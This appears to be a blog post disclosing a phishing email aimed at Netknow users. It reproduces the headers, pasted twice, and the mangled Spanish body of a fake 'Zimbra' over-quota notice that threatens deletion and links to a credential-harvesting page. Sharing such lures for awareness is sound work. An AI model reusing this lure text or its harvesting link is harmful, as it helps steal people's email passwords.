Phishing attempt to get Netknow user passwords
Posted by Dave Yadallee on
Return-path:
Envelope-to: dave@doctor.nl2k.ab.ca
Delivery-date: Sun, 15 May 2022 05:11:00 -0600
Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))
(envelope-from)
id 1nqC8i-0004DS-8e
for dave@doctor.nl2k.ab.ca;
Sun, 15 May 2022 05:10:20 -0600
Resent-From: The Doctor
Resent-Date: Sun, 15 May 2022 05:10:20 -0600
Resent-Message-ID:
Resent-To: Dave Yadallee
Received: from serv.boliviatv.bo ([190.129.69.244]:39320)
by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
(Exim 4.95 (FreeBSD))
(envelope-from)
id 1nq2FF-000DHk-81
for doctor@doctor.nl2k.ab.ca;
Sat, 14 May 2022 18:36:45 -0600
Received: from localhost (localhost [127.0.0.1])
by serv.boliviatv.bo (Postfix) with ESMTP id E650E607F6CB0;
Sat, 14 May 2022 17:22:26 -0400 (-04)
Received: from serv.boliviatv.bo ([127.0.0.1])
by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10032)
with ESMTP id vGBtr8cxBOiE; Sat, 14 May 2022 17:22:22 -0400 (-04)
Received: from localhost (localhost [127.0.0.1])
by serv.boliviatv.bo (Postfix) with ESMTP id CBFED60645D58;
Sat, 14 May 2022 16:37:03 -0400 (-04)
DKIM-Filter: OpenDKIM Filter v2.10.3 serv.boliviatv.bo CBFED60645D58
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=boliviatv.bo;
s=ACDE6D5E-6CEE-11EC-87BA-9154AF63F819; t=1652560623;
bh=T1iTR1MtBnuKLlqe0Z6qD/PLq2i2RTakkd78GTwxZGo=;
h=MIME-Version:To:From:Date:Message-Id;
b=F7md0+ugwjItAYLX4hKQq/7Lq2TCrNY3/NVSRzpD0eUy+FSVBy62vjBFPnvyNJ/J4
R+BIS8l5lG2zjlJvdpHMcgTnjj9W9SbevOu+j7r2tq4vxwjNdFQpsRz9+wsHq9ec5L
uG6IrqXiN49nkDHR3sNOhkrnXPfLNUR+t691iAQMkvQJ0fZZUzdf4GmCYvnNGl+pzT
TKPfeG0owji/bRG8UDsqkNFmZ5T+3K+WnMO8i2A6466HyEAavF1daoA+H+zKARilw5
ZG76QldHaYQRn75F2W9eO3tB5IJCnRdtFbR1Xfj6ZP2R09wDDF83yIT0klQ+MEeHx7
QCUUkO01KLnZQ==
X-Virus-Scanned: amavisd-new at boliviatv.bo
Received: from serv.boliviatv.bo ([127.0.0.1])
by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP id ADNQPb6YzdSU; Sat, 14 May 2022 16:37:03 -0400 (-04)
Received: from [103.1.179.201] (unknown [103.1.179.201])
by serv.boliviatv.bo (Postfix) with ESMTPSA id 0D5656067BE9B;
Sat, 14 May 2022 16:09:14 -0400 (-04)
Content-Type: multipart/alternative; boundary="===============1187788901=="
MIME-Version: 1.0
Subject: Verify your account
To: Recipients
From: "Zimbra"
Date: Sun, 15 May 2022 01:39:05 +0530
Message-Id: <20220514200915.0D5656067BE9B@serv.boliviatv.bo>
You will not see this in a MIME-aware mail reader.
--===============1187788901==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body
Estimados usuarios de correo de Zimbra: =
Su cuenta ha superado el l=EDmite de cuota establecido por el administrado=
r y es posible que no pueda enviar o recibir correo nuevo hasta que vuelva =
a validar su cuenta.
=
=
=
Para volver a validar su cuenta, =
=
=
HAGA CLIC AQU=CD PARA VERIFICAR
=
haga clic en el enlace de arriba para verificar =
Si no lo verifica, su cuenta se desactivar=E1 permanentemente y se elimina=
r=E1 de nuestra base de datos.
=A92022 Zimbra Customer Care C
--===============1187788901==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body
=3Diso-8859-1"/>
imes new roman", "new york", times, serif; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STY=
LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px=
; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s=
troke-width: 0px; text-decoration-thickness: initial; text-decoration-style=
: initial; text-decoration-color: initial'>Estimados usuarios de correo de =
Zimbra:
Envelope-to: dave@doctor.nl2k.ab.ca
Delivery-date: Sun, 15 May 2022 05:11:00 -0600
Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))
(envelope-from
id 1nqC8i-0004DS-8e
for dave@doctor.nl2k.ab.ca;
Sun, 15 May 2022 05:10:20 -0600
Resent-From: The Doctor
Resent-Date: Sun, 15 May 2022 05:10:20 -0600
Resent-Message-ID:
Resent-To: Dave Yadallee
Received: from serv.boliviatv.bo ([190.129.69.244]:39320)
by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
(Exim 4.95 (FreeBSD))
(envelope-from
id 1nq2FF-000DHk-81
for doctor@doctor.nl2k.ab.ca;
Sat, 14 May 2022 18:36:45 -0600
Received: from localhost (localhost [127.0.0.1])
by serv.boliviatv.bo (Postfix) with ESMTP id E650E607F6CB0;
Sat, 14 May 2022 17:22:26 -0400 (-04)
Received: from serv.boliviatv.bo ([127.0.0.1])
by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10032)
with ESMTP id vGBtr8cxBOiE; Sat, 14 May 2022 17:22:22 -0400 (-04)
Received: from localhost (localhost [127.0.0.1])
by serv.boliviatv.bo (Postfix) with ESMTP id CBFED60645D58;
Sat, 14 May 2022 16:37:03 -0400 (-04)
DKIM-Filter: OpenDKIM Filter v2.10.3 serv.boliviatv.bo CBFED60645D58
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=boliviatv.bo;
s=ACDE6D5E-6CEE-11EC-87BA-9154AF63F819; t=1652560623;
bh=T1iTR1MtBnuKLlqe0Z6qD/PLq2i2RTakkd78GTwxZGo=;
h=MIME-Version:To:From:Date:Message-Id;
b=F7md0+ugwjItAYLX4hKQq/7Lq2TCrNY3/NVSRzpD0eUy+FSVBy62vjBFPnvyNJ/J4
R+BIS8l5lG2zjlJvdpHMcgTnjj9W9SbevOu+j7r2tq4vxwjNdFQpsRz9+wsHq9ec5L
uG6IrqXiN49nkDHR3sNOhkrnXPfLNUR+t691iAQMkvQJ0fZZUzdf4GmCYvnNGl+pzT
TKPfeG0owji/bRG8UDsqkNFmZ5T+3K+WnMO8i2A6466HyEAavF1daoA+H+zKARilw5
ZG76QldHaYQRn75F2W9eO3tB5IJCnRdtFbR1Xfj6ZP2R09wDDF83yIT0klQ+MEeHx7
QCUUkO01KLnZQ==
X-Virus-Scanned: amavisd-new at boliviatv.bo
Received: from serv.boliviatv.bo ([127.0.0.1])
by localhost (serv.boliviatv.bo [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP id ADNQPb6YzdSU; Sat, 14 May 2022 16:37:03 -0400 (-04)
Received: from [103.1.179.201] (unknown [103.1.179.201])
by serv.boliviatv.bo (Postfix) with ESMTPSA id 0D5656067BE9B;
Sat, 14 May 2022 16:09:14 -0400 (-04)
Content-Type: multipart/alternative; boundary="===============1187788901=="
MIME-Version: 1.0
Subject: Verify your account
To: Recipients
From: "Zimbra"
Date: Sun, 15 May 2022 01:39:05 +0530
Message-Id: <20220514200915.0D5656067BE9B@serv.boliviatv.bo>
You will not see this in a MIME-aware mail reader.
--===============1187788901==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body
Estimados usuarios de correo de Zimbra: =
Su cuenta ha superado el l=EDmite de cuota establecido por el administrado=
r y es posible que no pueda enviar o recibir correo nuevo hasta que vuelva =
a validar su cuenta.
=
=
=
Para volver a validar su cuenta, =
=
=
HAGA CLIC AQU=CD PARA VERIFICAR
=
haga clic en el enlace de arriba para verificar =
Si no lo verifica, su cuenta se desactivar=E1 permanentemente y se elimina=
r=E1 de nuestra base de datos.
=A92022 Zimbra Customer Care C
--===============1187788901==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body
=3Diso-8859-1"/>
imes new roman", "new york", times, serif; WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STY=
LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px=
; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s=
troke-width: 0px; text-decoration-thickness: initial; text-decoration-style=
: initial; text-decoration-color: initial'>Estimados usuarios de correo de =
Zimbra:
times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none;=
FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOW=
S: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: nor=
mal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decora=
tion-thickness: initial; text-decoration-style: initial; text-decoration-co=
lor: initial'>
k", times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=
one; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; =
ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; =
TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=
decoration-style: initial; text-decoration-color: initial'>Su cuenta ha sup=
erado el l=EDmite de cuota establecido por el administrador y es posible qu=
e no pueda enviar o recibir correo nuevo hasta que vuelva a validar su cuen=
ta.
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=
00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=
ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=
nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=
initial; text-decoration-style: initial; text-decoration-color: initial">
d; BORDER-RIGHT: rgb(187,187,187) 1px dashed; BORDER-COLLAPSE: collapse; BO=
RDER-BOTTOM: rgb(187,187,187) 1px dashed; BORDER-LEFT: rgb(187,187,187) 1px=
dashed">
FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(240,240,24=
0) 1pt inset; WIDTH: 105.85pt; BACKGROUND: red; BORDER-BOTTOM: rgb(240,240,=
240) 1pt solid; PADDING-BOTTOM: 0cm; PADDING-TOP: 0cm; PADDING-LEFT: 5.4pt;=
BORDER-LEFT: rgb(240,240,240) 1pt solid; PADDING-RIGHT: 5.4pt" width=3D141>
GIN-RIGHT: 0px">
verdana, sans-serif">
FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(187,187,18=
7) 1pt solid; WIDTH: 35.4pt; BACKGROUND-IMAGE: none; BACKGROUND-REPEAT: rep=
eat; BORDER-BOTTOM: rgb(187,187,187) 1pt solid; BACKGROUND-POSITION: 0% 0%;=
PADDING-BOTTOM: 0cm; PADDING-TOP: 0cm; PADDING-LEFT: 5.4pt; BORDER-LEFT: r=
gb(187,187,187); PADDING-RIGHT: 5.4pt" width=3D47>
GIN-RIGHT: 0px">
serif">
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=
00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=
ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=
nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=
initial; text-decoration-style: initial; text-decoration-color: initial">
Para volver a validar su cuenta,
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=
00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=
ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=
nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=
initial; text-decoration-style: initial; text-decoration-color: initial"><=
BR>
87,187) 1px dashed; BORDER-RIGHT: rgb(187,187,187) 1px dashed; WIDTH: 300px=
; BORDER-BOTTOM: rgb(187,187,187) 1px dashed; PADDING-BOTTOM: 0px; PADDING-=
TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(187,187,187) 1px dashed; MARG=
IN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(8,75,138); border-radius=
: 5px">
-FAMILY: Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(187,187,1=
87) 1px dashed; BORDER-BOTTOM: rgb(187,187,187) 1px dashed; PADDING-BOTTOM:=
0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(187,187,187) 1p=
x dashed; PADDING-RIGHT: 0px">
ACKGROUND: none transparent scroll repeat 0% 0%; OUTLINE-WIDTH: medium; PAD=
DING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px;=
MARGIN: 0px; PADDING-RIGHT: 0px" href=3D"http://energymin.gov.lk/mail1.php=
" rel=3D"nofollow%20noopener%20nofollow%20noopener%20noreferrer nofollow no=
opener noreferrer nofollow noopener noreferrer nofollow noopener noreferrer=
noreferrer noreferrer noreferrer noreferrer noreferrer" target=3D_blank>
PAN style=3D"COLOR: rgb(255,255,255)">
sans-serif">HAGA CLIC AQU=CD PARA VERIFICAR=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=
00; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SP=
ACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=
nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness:=
initial; text-decoration-style: initial; text-decoration-color: initial"><=
BR>
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =
normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=
text-decoration-style: initial; text-decoration-color: initial'>haga clic =
en el enlace de arriba para verificar
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =
normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=
text-decoration-style: initial; text-decoration-color: initial'>
k", times, serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=
one; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; =
ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; =
TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=
decoration-style: initial; text-decoration-color: initial'>Si no lo verific=
a, su cuenta se desactivar=E1 permanentemente y se eliminar=E1 de nuestra b=
ase de datos.
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =
normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=
text-decoration-style: initial; text-decoration-color: initial'>
e=3D"FONT-SIZE: 12pt">
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: =
normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial;=
text-decoration-style: initial; text-decoration-color: initial'>
e=3D"FONT-SIZE: 12pt; FONT-FAMILY: arial, helvetica, sans-serif; WHITE-SPAC=
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(0,0,0); FONT-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR:=
rgb(255,255,255); TEXT-INDENT: 0px"> =A92022 Zimbra Customer Care
SPAN>C
--===============1187788901==--